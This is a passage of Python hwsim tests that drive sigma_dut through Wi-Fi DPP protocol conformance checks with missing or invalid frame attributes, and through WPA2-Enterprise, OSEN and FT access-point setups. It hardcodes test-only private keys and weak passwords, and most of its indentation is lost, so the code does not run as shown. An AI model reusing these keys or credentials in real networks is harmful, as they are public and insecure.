"Missing or invalid required DPP Status attribute"),
("MissingAttribute", "ConfigurationRequest", "EnrolleeNonce",
"BootstrapResult,OK,AuthResult,OK,ConfResult,Errorsent",
"Missing or invalid Enrollee Nonce attribute") ]
for step, frame, attr, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_responder(dev, step, frame, attr, result,
fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_responder(dev, step, frame, attr, result, fail):
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
    hex_uri = res.split(',')[3]
    uri = hex_uri.decode('hex')
logger.info("URI from sigma_dut: " + uri)
res = dev[1].request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
id1 = int(res)
t = threading.Thread(target=dpp_proto_init, args=(dev[1], id1))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr), timeout=10)
t.join()
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly:" + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_stop_at_initiator(dev, apdev):
"""sigma_dut DPP protocol testing - Stop at RX on Initiator"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
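    # Each tuple: (frame type to stop at, expected sigma_dut result string,
    # expected DPP-FAIL reason on the peer or None).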
tests = [ ("AuthenticationResponse",
"BootstrapResult,OK,AuthResult,Errorsent",
None),
("ConfigurationRequest",
"BootstrapResult,OK,AuthResult,OK,ConfResult,Errorsent",
None)]
for frame, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_stop_at_initiator(dev, frame, result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_stop_at_initiator(dev, frame, result, fail):
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,Timeout,DPPFrameType,%s" % (frame))
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly: " + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_stop_at_initiator_enrollee(dev, apdev):
"""sigma_dut DPP protocol testing - Stop at TX on Initiator/Enrollee"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [ ("AuthenticationConfirm",
"BootstrapResult,OK,AuthResult,Errorsent,LastFrameReceived,AuthenticationResponse",
None) ]
for frame, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname, debug=True)
try:
run_sigma_dut_dpp_proto_stop_at_initiator_enrollee(dev, frame,
result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_stop_at_initiator_enrollee(dev, frame, result,
fail):
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPStep,Timeout,DPPFrameType,%s" % (frame), timeout=10)
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly: " + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_stop_at_responder(dev, apdev):
"""sigma_dut DPP protocol testing - Stop at RX on Responder"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
tests = [ ("AuthenticationRequest",
"BootstrapResult,OK,AuthResult,Errorsent",
None),
("AuthenticationConfirm",
"BootstrapResult,OK,AuthResult,Errorsent",
None) ]
for frame, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_stop_at_responder(dev, frame, result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_stop_at_responder(dev, frame, result, fail):
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
    hex_uri = res.split(',')[3]
    uri = hex_uri.decode('hex')
logger.info("URI from sigma_dut: " + uri)
res = dev[1].request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
id1 = int(res)
t = threading.Thread(target=dpp_proto_init, args=(dev[1], id1))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6,DPPStep,Timeout,DPPFrameType,%s" % (frame), timeout=10)
t.join()
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly:" + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def dpp_proto_init_pkex(dev):
time.sleep(1)
logger.info("Starting DPP PKEX initiator/configurator in a thread")
cmd = "DPP_CONFIGURATOR_ADD"
    res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
cmd = "DPP_BOOTSTRAP_GEN type=pkex"
res = dev.request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id = int(res)
cmd = "DPP_PKEX_ADD own=%d init=1 conf=sta-dpp configurator=%d code=secret" % (id, conf_id)
if "FAIL" in dev.request(cmd):
raise Exception("Failed to initiate DPP PKEX")
def test_sigma_dut_dpp_proto_initiator_pkex(dev, apdev):
"""sigma_dut DPP protocol testing - Initiator (PKEX)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
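    # Tuple fields as in test_sigma_dut_dpp_proto_initiator() above.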
tests = [ ("InvalidValue", "PKEXCRRequest", "WrappedData",
"BootstrapResult,Errorsent",
None),
("MissingAttribute", "PKEXExchangeRequest", "FiniteCyclicGroup",
"BootstrapResult,Errorsent",
"Missing or invalid Finite Cyclic Group attribute"),
("MissingAttribute", "PKEXCRRequest", "BSKey",
"BootstrapResult,Errorsent",
"No valid peer bootstrapping key found") ]
for step, frame, attr, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_initiator_pkex(dev, step, frame, attr,
result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_initiator_pkex(dev, step, frame, attr, result, fail):
cmd = "DPP_BOOTSTRAP_GEN type=pkex"
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id1 = int(res)
cmd = "DPP_PKEX_ADD own=%d code=secret" % (id1)
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to set PKEX data (responder)")
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCode,secret,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr))
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly: " + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def test_sigma_dut_dpp_proto_responder_pkex(dev, apdev):
"""sigma_dut DPP protocol testing - Responder (PKEX)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
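    # Tuple fields as in test_sigma_dut_dpp_proto_initiator() above.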
tests = [ ("InvalidValue", "PKEXCRResponse", "WrappedData",
"BootstrapResult,Errorsent",
None),
("MissingAttribute", "PKEXExchangeResponse", "DPPStatus",
"BootstrapResult,Errorsent",
"No DPP Status attribute"),
("MissingAttribute", "PKEXCRResponse", "BSKey",
"BootstrapResult,Errorsent",
"No valid peer bootstrapping key found") ]
for step, frame, attr, result, fail in tests:
dev[0].request("FLUSH")
dev[1].request("FLUSH")
sigma = start_sigma_dut(dev[0].ifname)
try:
run_sigma_dut_dpp_proto_responder_pkex(dev, step, frame, attr,
result, fail)
finally:
stop_sigma_dut(sigma)
def run_sigma_dut_dpp_proto_responder_pkex(dev, step, frame, attr, result, fail):
t = threading.Thread(target=dpp_proto_init_pkex, args=(dev[1],))
t.start()
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCode,secret,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr), timeout=10)
t.join()
if result not in res:
raise Exception("Unexpected result: " + res)
if fail:
ev = dev[1].wait_event(["DPP-FAIL"], timeout=5)
if ev is None or fail not in ev:
raise Exception("Failure not reported correctly:" + str(ev))
dev[1].request("DPP_STOP_LISTEN")
dev[0].dump_monitor()
dev[1].dump_monitor()
def init_sigma_dut_dpp_proto_peer_disc_req(dev, apdev):
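    # Bring up a DPP AP and a Configurator peer, then deliver the peer
    # bootstrapping info to sigma_dut; the caller runs the actual
    # protocol-testing exchange.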
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg"
ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b"
params = { "ssid": "DPPNET01",
"wpa": "2",
"ieee80211w": "2",
"wpa_key_mgmt": "DPP",
"rsn_pairwise": "CCMP",
"dpp_connector": ap_connector,
"dpp_csign": csign_pub,
"dpp_netaccesskey": ap_netaccesskey }
try:
hapd = hostapd.add_ap(apdev[0], params)
    except Exception:
raise HwsimSkip("DPP not supported")
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
    res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % ("DPPNET01".encode("hex"), conf_id));
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
def test_sigma_dut_dpp_proto_peer_disc_req(dev, apdev):
"""sigma_dut DPP protocol testing - Peer Discovery Request"""
sigma = start_sigma_dut(dev[0].ifname)
try:
init_sigma_dut_dpp_proto_peer_disc_req(dev, apdev)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes,DPPStep,MissingAttribute,DPPFrameType,PeerDiscoveryRequest,DPPIEAttribute,TransactionID", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,Errorsent" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_self_config(dev, apdev):
"""sigma_dut DPP Configurator enrolling an AP and using self-configuration"""
check_dpp_capab(dev[0])
hapd = hostapd.add_ap(apdev[0], { "ssid": "unconfigured" })
check_dpp_capab(hapd)
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
addr = hapd.own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/1 mac=" + addr
res = hapd.request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id = int(res)
uri = hapd.request("DPP_BOOTSTRAP_GET_URI %d" % id)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,AP,DPPBS,QR,DPPTimeout,6")
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
update_hapd_config(hapd)
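        # Second exchange: with DPPSelfConfigure,Yes the Configurator
        # provisions itself and then connects to the AP it just configured.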
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPCryptoIdentifier,P-256,DPPBS,QR,DPPAuthRole,Initiator,DPPProvisioningRole,Configurator,DPPAuthDirection,Single,DPPConfIndex,1,DPPTimeout,6,DPPWaitForConnect,Yes,DPPSelfConfigure,Yes"
res = sigma_dut_cmd(cmd, timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
dev[0].set("dpp_config_processing", "0")
def test_sigma_dut_ap_dpp_self_config(dev, apdev, params):
"""sigma_dut DPP AP Configurator using self-configuration"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_dpp_self_config.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
run_sigma_dut_ap_dpp_self_config(dev, apdev)
finally:
stop_sigma_dut(sigma)
dev[0].set("dpp_config_processing", "0")
def run_sigma_dut_ap_dpp_self_config(dev, apdev):
check_dpp_capab(dev[0])
sigma_dut_cmd_check("ap_reset_default,program,DPP")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,AP,DPPBS,QR,DPPConfIndex,1,DPPSelfConfigure,Yes,DPPTimeout,6", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
dev[0].set("dpp_config_processing", "2")
addr = dev[0].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/11 mac=" + addr
res = dev[0].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id = int(res)
uri = dev[0].request("DPP_BOOTSTRAP_GET_URI %d" % id)
cmd = "DPP_LISTEN 2462 role=enrollee"
if "OK" not in dev[0].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6"
res = sigma_dut_cmd(cmd)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
dev[0].wait_connected()
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
sigma_dut_cmd_check("ap_reset_default")
def test_sigma_dut_preconfigured_profile(dev, apdev):
"""sigma_dut controlled connection using preconfigured profile"""
try:
run_sigma_dut_preconfigured_profile(dev, apdev)
finally:
dev[0].set("ignore_old_scan_res", "0")
def run_sigma_dut_preconfigured_profile(dev, apdev):
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
params = hostapd.wpa2_params(ssid="test-psk", passphrase="12345678")
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-psk", psk="12345678", scan_freq="2412",
only_add_network=True)
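    # only_add_network=True stores the profile without connecting;
    # sigma_dut triggers the actual association below.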
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s" % (ifname, "test-psk"))
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
def test_sigma_dut_wps_pbc(dev, apdev):
"""sigma_dut and WPS PBC Enrollee"""
try:
run_sigma_dut_wps_pbc(dev, apdev)
finally:
dev[0].set("ignore_old_scan_res", "0")
def run_sigma_dut_wps_pbc(dev, apdev):
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": "wps", "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP" })
hapd.request("WPS_PBC")
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
cmd = "start_wps_registration,interface,%s" % ifname
cmd += ",WpsRole,Enrollee"
cmd += ",WpsConfigMethod,PBC"
sigma_dut_cmd_check(cmd, timeout=15)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
hapd.disable()
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
stop_sigma_dut(sigma)
dev[0].flush_scan_cache()
def test_sigma_dut_sta_scan_bss(dev, apdev):
"""sigma_dut sta_scan_bss"""
hapd = hostapd.add_ap(apdev[0], { "ssid": "test" })
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "sta_scan_bss,Interface,%s,BSSID,%s" % (dev[0].ifname, \
hapd.own_addr())
res = sigma_dut_cmd(cmd, timeout=10)
if "ssid,test,bsschannel,1" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_osen(dev, apdev, params):
"""sigma_dut controlled AP with OSEN"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_osen.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-hs20,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OSEN,PMF,Optional")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
# RSN-OSEN (for OSU)
dev[0].connect("test-hs20", proto="OSEN", key_mgmt="OSEN",
pairwise="CCMP", group="GTK_NOT_USED",
eap="WFA-UNAUTH-TLS", identity="osen@example.com",
ca_cert="auth_serv/ca.pem", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_eap_osen(dev, apdev, params):
"""sigma_dut controlled AP with EAP+OSEN"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_eap_osen.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, bridge="ap-br0", hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-hs20,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT-OSEN,PMF,Optional")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
subprocess.call(['brctl', 'setfd', 'ap-br0', '0'])
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'up'])
# RSN-OSEN (for OSU)
dev[0].connect("test-hs20", proto="OSEN", key_mgmt="OSEN",
pairwise="CCMP",
eap="WFA-UNAUTH-TLS", identity="osen@example.com",
ca_cert="auth_serv/ca.pem", ieee80211w='2',
scan_freq="2412")
# RSN-EAP (for data connection)
dev[1].connect("test-hs20", key_mgmt="WPA-EAP", eap="TTLS",
identity="hs20-test", password="password",
ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
ieee80211w='2', scan_freq="2412")
hwsim_utils.test_connectivity(dev[0], dev[1], broadcast=False,
success_expected=False, timeout=1)
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'down'],
stderr=open('/dev/null', 'w'))
subprocess.call(['brctl', 'delbr', 'ap-br0'],
stderr=open('/dev/null', 'w'))
def test_sigma_dut_ap_eap(dev, apdev, params):
"""sigma_dut controlled AP WPA2-Enterprise"""
logdir = os.path.join(params['logdir'], "sigma_dut_ap_eap.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-eap,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-eap", key_mgmt="WPA-EAP", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_eap_sha256(dev, apdev, params):
"""sigma_dut controlled AP WPA2-Enterprise SHA256"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_eap_sha256.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-eap,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT-256")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-eap", key_mgmt="WPA-EAP-SHA256", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_ft_eap(dev, apdev, params):
"""sigma_dut controlled AP FT-EAP"""
logdir = os.path.join(params['logdir'], "sigma_dut_ap_ft_eap.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ft-eap,MODE,11ng,DOMAIN,0101,FT_OA,Enable")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,FT-EAP")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-ft-eap", key_mgmt="FT-EAP", eap="GPSK",
identity="gpsk user",
password="abcdefghijklmnop0123456789abcdef",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_ft_psk(dev, apdev, params):
"""sigma_dut controlled AP FT-PSK"""
logdir = os.path.join(params['logdir'], "sigma_dut_ap_ft_psk.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ft-psk,MODE,11ng,DOMAIN,0101,FT_OA,Enable")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,FT-PSK,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-ft-psk", key_mgmt="FT-PSK", psk="12345678",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
